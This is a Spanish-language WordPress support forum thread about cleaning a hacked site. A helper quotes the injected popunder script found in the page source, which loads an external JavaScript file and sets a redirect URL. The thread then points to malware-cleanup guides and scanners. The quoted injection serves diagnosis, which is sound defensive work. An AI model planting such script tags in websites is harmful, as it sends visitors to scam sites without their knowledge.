Hay una inyección de código… si te fijas en el código fuente de la página principal, al principio de todo se ha incluido un código como este:
< script >
var popunder = {expire: 1, url: "https://example.com/?u=mr1kd0x&o=f5pp7z3&t=p&cid=1h6bjh78p6mbh0"};
</ script >
< script src="https://example.com/js/popunder.js" >< /script >
Es muy probable que sea algún plugin o algo que tenga problemas. Lo ideal será, no simplemente sobrescribir todos los componentes del WordPress, sino ir eliminando esa partes y sustituirlas por una versión oficial actualizada.
Iniciador del debate
Amaia
(@amaiaesteban)
No sé pero yo no veo ese script, he probado a borrar la cache, diferente navegación y no loo veo. Aún y todo te agradezco porque gracias a tu aportación he dado con lo que pasa en este post:
https://blog.sucuri.net/2022/04/wordpress-popunder-malware-redirects-to-scam-sites.html
Ahora a intentar solucionarlo no sé si lo conseguiré 😉
Iniciador del debate
Amaia
(@amaiaesteban)
Ya he conseguido ver el script pero nada, sigo sin ver el código en los archivos.Por lo que he leído se suele poner en el footer pero nada, ni rastro. También he mirado en la base de datos y nada. Mi gozo en un pozo @javiercasares
En principio, siguiendo los manuales debería funcionar.
Prueba con el que hay aquí en los foros.
https://es.wordpress.org/support/topic/limpiar-un-wordpress-infectadohackeado/
Si ves que no funciona, puedes probar otros como:
https://www.wpsysadmin.com/seguridad/especial/limpiar/
Uno, específico, que podría ser para lo que te ocurre, es este:
https://www.wpsysadmin.com/blog/2019/12/13/wordpress-hackeado-con-redireccion/
De todas formas, el planteamiento es sustituir el código <script
por algo como <scr1pt
.
En cualquier caso, vaciar carpetas, sustituir ficheros, tanto del core, como de temas, como de plugins, y poner versiones actualizadas de todo, y debería funciona.
También puedes usar alguna herramienta del tipo antivirus:
https://www.wpsysadmin.com/blog/2021/03/25/antivirus-wordpress/
o un sistema contra malware
https://www.wpsysadmin.com/extra/awscan/
Si tienes más pistas, dime e intento darte algún elemento mucho más concreto.